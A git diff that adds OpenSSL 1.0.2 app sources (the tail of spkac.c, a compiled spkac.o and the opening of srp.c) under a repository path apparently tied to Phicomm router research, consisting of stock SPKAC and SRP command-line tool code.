+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <time.h>
+#include "apps.h"
+#include <openssl/bio.h>
+#include <openssl/conf.h>
+#include <openssl/err.h>
+#include <openssl/evp.h>
+#include <openssl/lhash.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+
+#undef PROG
+#define PROG    spkac_main
+
+/*-
+ * -in arg      - input file - default stdin
+ * -out arg     - output file - default stdout
+ */
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    ENGINE *e = NULL;
+    int i, badops = 0, ret = 1;
+    BIO *in = NULL, *out = NULL;
+    int verify = 0, noout = 0, pubkey = 0;
+    char *infile = NULL, *outfile = NULL, *prog;
+    char *passargin = NULL, *passin = NULL;
+    const char *spkac = "SPKAC", *spksect = "default";
+    char *spkstr = NULL;
+    char *challenge = NULL, *keyfile = NULL;
+    CONF *conf = NULL;
+    NETSCAPE_SPKI *spki = NULL;
+    EVP_PKEY *pkey = NULL;
+#ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+#endif
+
+    apps_startup();
+
+    if (!bio_err)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    prog = argv[0];
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-passin") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passargin = *(++argv);
+        } else if (strcmp(*argv, "-key") == 0) {
+            if (--argc < 1)
+                goto bad;
+            keyfile = *(++argv);
+        } else if (strcmp(*argv, "-challenge") == 0) {
+            if (--argc < 1)
+                goto bad;
+            challenge = *(++argv);
+        } else if (strcmp(*argv, "-spkac") == 0) {
+            if (--argc < 1)
+                goto bad;
+            spkac = *(++argv);
+        } else if (strcmp(*argv, "-spksect") == 0) {
+            if (--argc < 1)
+                goto bad;
+            spksect = *(++argv);
+        }
+#ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        }
+#endif
+        else if (strcmp(*argv, "-noout") == 0)
+            noout = 1;
+        else if (strcmp(*argv, "-pubkey") == 0)
+            pubkey = 1;
+        else if (strcmp(*argv, "-verify") == 0)
+            verify = 1;
+        else
+            badops = 1;
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+ bad:
+        BIO_printf(bio_err, "%s [options]\n", prog);
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, " -in arg        input file\n");
+        BIO_printf(bio_err, " -out arg       output file\n");
+        BIO_printf(bio_err,
+                   " -key arg       create SPKAC using private key\n");
+        BIO_printf(bio_err,
+                   " -passin arg    input file pass phrase source\n");
+        BIO_printf(bio_err, " -challenge arg challenge string\n");
+        BIO_printf(bio_err, " -spkac arg     alternative SPKAC name\n");
+        BIO_printf(bio_err, " -noout         don't print SPKAC\n");
+        BIO_printf(bio_err, " -pubkey        output public key\n");
+        BIO_printf(bio_err, " -verify        verify SPKAC signature\n");
+#ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   " -engine e      use engine e, possibly a hardware device.\n");
+#endif
+        goto end;
+    }
+
+    ERR_load_crypto_strings();
+    if (!app_passwd(bio_err, passargin, NULL, &passin, NULL)) {
+        BIO_printf(bio_err, "Error getting password\n");
+        goto end;
+    }
+#ifndef OPENSSL_NO_ENGINE
+    e = setup_engine(bio_err, engine, 0);
+#endif
+
+    if (keyfile) {
+        pkey = load_key(bio_err,
+                        strcmp(keyfile, "-") ? keyfile : NULL,
+                        FORMAT_PEM, 1, passin, e, "private key");
+        if (!pkey) {
+            goto end;
+        }
+        spki = NETSCAPE_SPKI_new();
+        if (challenge)
+            ASN1_STRING_set(spki->spkac->challenge,
+                            challenge, (int)strlen(challenge));
+        NETSCAPE_SPKI_set_pubkey(spki, pkey);
+        NETSCAPE_SPKI_sign(spki, pkey, EVP_md5());
+        spkstr = NETSCAPE_SPKI_b64_encode(spki);
+
+        if (outfile)
+            out = BIO_new_file(outfile, "w");
+        else {
+            out = BIO_new_fp(stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+            {
+                BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+                out = BIO_push(tmpbio, out);
+            }
+#endif
+        }
+
+        if (!out) {
+            BIO_printf(bio_err, "Error opening output file\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        BIO_printf(out, "SPKAC=%s\n", spkstr);
+        OPENSSL_free(spkstr);
+        ret = 0;
+        goto end;
+    }
+
+    if (infile)
+        in = BIO_new_file(infile, "r");
+    else
+        in = BIO_new_fp(stdin, BIO_NOCLOSE);
+
+    if (!in) {
+        BIO_printf(bio_err, "Error opening input file\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    conf = NCONF_new(NULL);
+    i = NCONF_load_bio(conf, in, NULL);
+
+    if (!i) {
+        BIO_printf(bio_err, "Error parsing config file\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    spkstr = NCONF_get_string(conf, spksect, spkac);
+
+    if (!spkstr) {
+        BIO_printf(bio_err, "Can't find SPKAC called \"%s\"\n", spkac);
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    spki = NETSCAPE_SPKI_b64_decode(spkstr, -1);
+
+    if (!spki) {
+        BIO_printf(bio_err, "Error loading SPKAC\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (outfile)
+        out = BIO_new_file(outfile, "w");
+    else {
+        out = BIO_new_fp(stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+#endif
+    }
+
+    if (!out) {
+        BIO_printf(bio_err, "Error opening output file\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (!noout)
+        NETSCAPE_SPKI_print(out, spki);
+    pkey = NETSCAPE_SPKI_get_pubkey(spki);
+    if (verify) {
+        i = NETSCAPE_SPKI_verify(spki, pkey);
+        if (i > 0)
+            BIO_printf(bio_err, "Signature OK\n");
+        else {
+            BIO_printf(bio_err, "Signature Failure\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+    if (pubkey)
+        PEM_write_bio_PUBKEY(out, pkey);
+
+    ret = 0;
+
+ end:
+    NCONF_free(conf);
+    NETSCAPE_SPKI_free(spki);
+    BIO_free(in);
+    BIO_free_all(out);
+    EVP_PKEY_free(pkey);
+    if (passin)
+        OPENSSL_free(passin);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/spkac.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/spkac.o
new file mode 100644
index 0000000000000000000000000000000000000000..8e184f967a76f00443769cc078d419715b543de5
GIT binary patch
literal 10024
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
AK>z>%

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/srp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/srp.c
new file mode 100644
index 0000000..47b45fb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/srp.c
@@ -0,0 +1,760 @@
+/* apps/srp.c */
+/*
+ * Written by Peter Sylvester (peter.sylvester@edelweb.fr) for the EdelKey
+ * project and contributed to the OpenSSL project 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#include <openssl/opensslconf.h>
+
+#ifndef OPENSSL_NO_SRP
+# include <stdio.h>
+# include <stdlib.h>
+# include <string.h>
+# include <openssl/conf.h>
+# include <openssl/bio.h>
+# include <openssl/err.h>
+# include <openssl/txt_db.h>
+# include <openssl/buffer.h>
+# include <openssl/srp.h>
+
+# include "apps.h"
+
+# undef PROG
+# define PROG srp_main
+
+# define BASE_SECTION    "srp"
+# define CONFIG_FILE "openssl.cnf"
+
+# define ENV_RANDFILE            "RANDFILE"
+
+# define ENV_DATABASE            "srpvfile"
+# define ENV_DEFAULT_SRP         "default_srp"
+
+static char *srp_usage[] = {
+    "usage: srp [args] [user] \n",
+    "\n",
+    " -verbose        Talk alot while doing things\n",
+    " -config file    A config file\n",
+    " -name arg       The particular srp definition to use\n",
+    " -srpvfile arg   The srp verifier file name\n",
+    " -add            add an user and srp verifier\n",
+    " -modify         modify the srp verifier of an existing user\n",
+    " -delete         delete user from verifier file\n",
+    " -list           list user\n",
+    " -gn arg         g and N values to be used for new verifier\n",
+    " -userinfo arg   additional info to be set for user\n",
+    " -passin arg     input file pass phrase source\n",
+    " -passout arg    output file pass phrase source\n",
+# ifndef OPENSSL_NO_ENGINE
+    " -engine e         - use engine e, possibly a hardware device.\n",
+# endif
+    NULL
+};
+
+# ifdef EFENCE
+extern int EF_PROTECT_FREE;
+extern int EF_PROTECT_BELOW;
+extern int EF_ALIGNMENT;
+# endif
+
+static CONF *conf = NULL;
+static char *section = NULL;
+
+# define VERBOSE if (verbose)
+# define VVERBOSE if (verbose>1)
+
+int MAIN(int, char **);
+
+static int get_index(CA_DB *db, char *id, char type)
+{
+    char **pp;
+    int i;
+    if (id == NULL)
+        return -1;
+    if (type == DB_SRP_INDEX)
+        for (i = 0; i < sk_OPENSSL_PSTRING_num(db->db->data); i++) {
+            pp = sk_OPENSSL_PSTRING_value(db->db->data, i);
+            if (pp[DB_srptype][0] == DB_SRP_INDEX
+                && !strcmp(id, pp[DB_srpid]))
+                return i;
+    } else
+        for (i = 0; i < sk_OPENSSL_PSTRING_num(db->db->data); i++) {
+            pp = sk_OPENSSL_PSTRING_value(db->db->data, i);
+
+            if (pp[DB_srptype][0] != DB_SRP_INDEX
+                && !strcmp(id, pp[DB_srpid]))
+                return i;
+        }
+
+    return -1;
+}
+
+static void print_entry(CA_DB *db, BIO *bio, int indx, int verbose, char *s)
+{
+    if (indx >= 0 && verbose) {
+        int j;
+        char **pp = sk_OPENSSL_PSTRING_value(db->db->data, indx);
+        BIO_printf(bio, "%s \"%s\"\n", s, pp[DB_srpid]);
+        for (j = 0; j < DB_NUMBER; j++) {
+            BIO_printf(bio_err, "  %d = \"%s\"\n", j, pp[j]);
+        }
+    }
+}
+
+static void print_index(CA_DB *db, BIO *bio, int indexindex, int verbose)
+{
+    print_entry(db, bio, indexindex, verbose, "g N entry");
+}
+
+static void print_user(CA_DB *db, BIO *bio, int userindex, int verbose)
+{
+    if (verbose > 0) {
+        char **pp = sk_OPENSSL_PSTRING_value(db->db->data, userindex);
+
+        if (pp[DB_srptype][0] != 'I') {
+            print_entry(db, bio, userindex, verbose, "User entry");
+            print_entry(db, bio, get_index(db, pp[DB_srpgN], 'I'), verbose,
+                        "g N entry");
+        }
+
+    }
+}
+
+static int update_index(CA_DB *db, BIO *bio, char **row)
+{
+    char **irow;
+    int i;
+
+    if ((irow =
+         (char **)OPENSSL_malloc(sizeof(char *) * (DB_NUMBER + 1))) == NULL) {
+        BIO_printf(bio_err, "Memory allocation failure\n");
+        return 0;
+    }
+
+    for (i = 0; i < DB_NUMBER; i++) {
+        irow[i] = row[i];
+        row[i] = NULL;
+    }
+    irow[DB_NUMBER] = NULL;
+
+    if (!TXT_DB_insert(db->db, irow)) {
+        BIO_printf(bio, "failed to update srpvfile\n");
+        BIO_printf(bio, "TXT_DB error number %ld\n", db->db->error);
+        OPENSSL_free(irow);
+        return 0;
+    }
+    return 1;
+}
+
+static void lookup_fail(const char *name, char *tag)
+{
+    BIO_printf(bio_err, "variable lookup failed for %s::%s\n", name, tag);
+}
+
+static char *srp_verify_user(const char *user, const char *srp_verifier,
+                             char *srp_usersalt, const char *g, const char *N,
+                             const char *passin, BIO *bio, int verbose)
+{
+    char password[1024];
+    PW_CB_DATA cb_tmp;
+    char *verifier = NULL;
+    char *gNid = NULL;
+
+    cb_tmp.prompt_info = user;
+    cb_tmp.password = passin;
+
+    if (password_callback(password, 1024, 0, &cb_tmp) > 0) {
+        VERBOSE BIO_printf(bio,
+                           "Validating\n   user=\"%s\"\n srp_verifier=\"%s\"\n srp_usersalt=\"%s\"\n g=\"%s\"\n N=\"%s\"\n",
+                           user, srp_verifier, srp_usersalt, g, N);
+        BIO_printf(bio, "Pass %s\n", password);
+
+        if (!
+            (gNid =
+             SRP_create_verifier(user, password, &srp_usersalt, &verifier, N,
+                                 g))) {
+            BIO_printf(bio, "Internal error validating SRP verifier\n");
+        } else {
+            if (strcmp(verifier, srp_verifier))
+                gNid = NULL;
+            OPENSSL_free(verifier);
+        }
+    }
+    return gNid;
+}
+
+static char *srp_create_user(char *user, char **srp_verifier,
+                             char **srp_usersalt, char *g, char *N,
+                             char *passout, BIO *bio, int verbose)
+{
+    char password[1024];
+    PW_CB_DATA cb_tmp;
+    char *gNid = NULL;
+    char *salt = NULL;
+    cb_tmp.prompt_info = user;
+    cb_tmp.password = passout;
+
+    if (password_callback(password, 1024, 1, &cb_tmp) > 0) {
+        VERBOSE BIO_printf(bio,
+                           "Creating\n user=\"%s\"\n g=\"%s\"\n N=\"%s\"\n",
+                           user, g, N);
+        if (!
+            (gNid =
+             SRP_create_verifier(user, password, &salt, srp_verifier, N,
+                                 g))) {
+            BIO_printf(bio, "Internal error creating SRP verifier\n");
+        } else
+            *srp_usersalt = salt;
+        VVERBOSE BIO_printf(bio, "gNid=%s salt =\"%s\"\n verifier =\"%s\"\n",
+                            gNid, salt, *srp_verifier);
+
+    }
+    return gNid;
+}
+
+int MAIN(int argc, char **argv)
+{
+    int add_user = 0;
+    int list_user = 0;
+    int delete_user = 0;
+    int modify_user = 0;
+    char *user = NULL;
+
+    char *passargin = NULL, *passargout = NULL;
+    char *passin = NULL, *passout = NULL;
+    char *gN = NULL;
+    int gNindex = -1;
+    char **gNrow = NULL;
+    int maxgN = -1;
+
+    char *userinfo = NULL;
+
+    int badops = 0;
+    int ret = 1;
+    int errors = 0;
+    int verbose = 0;
+    int doupdatedb = 0;
+    char *configfile = NULL;
+    char *dbfile = NULL;
+    CA_DB *db = NULL;
+    char **pp;
+    int i;
+    long errorline = -1;
+    char *randfile = NULL;
+# ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+# endif
+    char *tofree = NULL;
+    DB_ATTR db_attr;
+
+# ifdef EFENCE
+    EF_PROTECT_FREE = 1;
+    EF_PROTECT_BELOW = 1;
+    EF_ALIGNMENT = 0;
+# endif
+
+    apps_startup();
+
+    conf = NULL;
+    section = NULL;
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    argc--;
+    argv++;
+    while (argc >= 1 && badops == 0) {
+        if (strcmp(*argv, "-verbose") == 0)
+            verbose++;
+        else if (strcmp(*argv, "-config") == 0) {
+            if (--argc < 1)
+                goto bad;
+            configfile = *(++argv);
+        } else if (strcmp(*argv, "-name") == 0) {
+            if (--argc < 1)
+                goto bad;
+            section = *(++argv);
+        } else if (strcmp(*argv, "-srpvfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            dbfile = *(++argv);
+        } else if (strcmp(*argv, "-add") == 0)
+            add_user = 1;
+        else if (strcmp(*argv, "-delete") == 0)
+            delete_user = 1;
+        else if (strcmp(*argv, "-modify") == 0)
+            modify_user = 1;
+        else if (strcmp(*argv, "-list") == 0)
+            list_user = 1;
+        else if (strcmp(*argv, "-gn") == 0) {
+            if (--argc < 1)
+                goto bad;
+            gN = *(++argv);
+        } else if (strcmp(*argv, "-userinfo") == 0) {
+            if (--argc < 1)
+                goto bad;
+            userinfo = *(++argv);
+        } else if (strcmp(*argv, "-passin") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passargin = *(++argv);
+        } else if (strcmp(*argv, "-passout") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passargout = *(++argv);
+        }
+# ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        }
+# endif
+
+        else if (**argv == '-') {
+ bad:
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badops = 1;
+            break;
+        } else
+            break;
+
+        argc--;
+        argv++;
+    }
+
+    if (dbfile && configfile) {
+        BIO_printf(bio_err,
+                   "-dbfile and -configfile cannot be specified together.\n");
+        badops = 1;
+    }
+    if (add_user + delete_user + modify_user + list_user != 1) {
+        BIO_printf(bio_err,
+                   "Exactly one of the options -add, -delete, -modify -list must be specified.\n");
+        badops = 1;
+    }
+    if (delete_user + modify_user + delete_user == 1 && argc <= 0) {
+        BIO_printf(bio_err,
+                   "Need at least one user for options -add, -delete, -modify. \n");
+        badops = 1;
+    }
+    if ((passin || passout) && argc != 1) {
+        BIO_printf(bio_err,
+                   "-passin, -passout arguments only valid with one user.\n");
+        badops = 1;
+    }
+
+    if (badops) {
+        for (pp = srp_usage; (*pp != NULL); pp++)
+            BIO_printf(bio_err, "%s", *pp);
+
+        BIO_printf(bio_err, " -rand file%cfile%c...\n", LIST_SEPARATOR_CHAR,
+                   LIST_SEPARATOR_CHAR);
+        BIO_printf(bio_err,
+                   "                 load the file (or the files in the directory) into\n");
+        BIO_printf(bio_err, "                 the random number generator\n");
+        goto err;
+    }
+
+    ERR_load_crypto_strings();
+
+# ifndef OPENSSL_NO_ENGINE
+    setup_engine(bio_err, engine, 0);
+# endif
+
+    if (!app_passwd(bio_err, passargin, passargout, &passin, &passout)) {
+        BIO_printf(bio_err, "Error getting passwords\n");
+        goto err;
+    }
+
+    if (!dbfile) {
+
+        /*****************************************************************/
+        tofree = NULL;
+        if (configfile == NULL)
+            configfile = getenv("OPENSSL_CONF");
+        if (configfile == NULL)
+            configfile = getenv("SSLEAY_CONF");
+        if (configfile == NULL) {
+            const char *s = X509_get_default_cert_area();
+            size_t len;
+
+# ifdef OPENSSL_SYS_VMS
+            len = strlen(s) + sizeof(CONFIG_FILE);
+            tofree = OPENSSL_malloc(len);
+            strcpy(tofree, s);
+# else
+            len = strlen(s) + sizeof(CONFIG_FILE) + 1;
+            tofree = OPENSSL_malloc(len);
+            BUF_strlcpy(tofree, s, len);
+            BUF_strlcat(tofree, "/", len);
+# endif
+            BUF_strlcat(tofree, CONFIG_FILE, len);
+            configfile = tofree;
+        }
+
+        VERBOSE BIO_printf(bio_err, "Using configuration from %s\n",
+                           configfile);
+        conf = NCONF_new(NULL);
+        if (NCONF_load(conf, configfile, &errorline) <= 0) {
+            if (errorline <= 0)
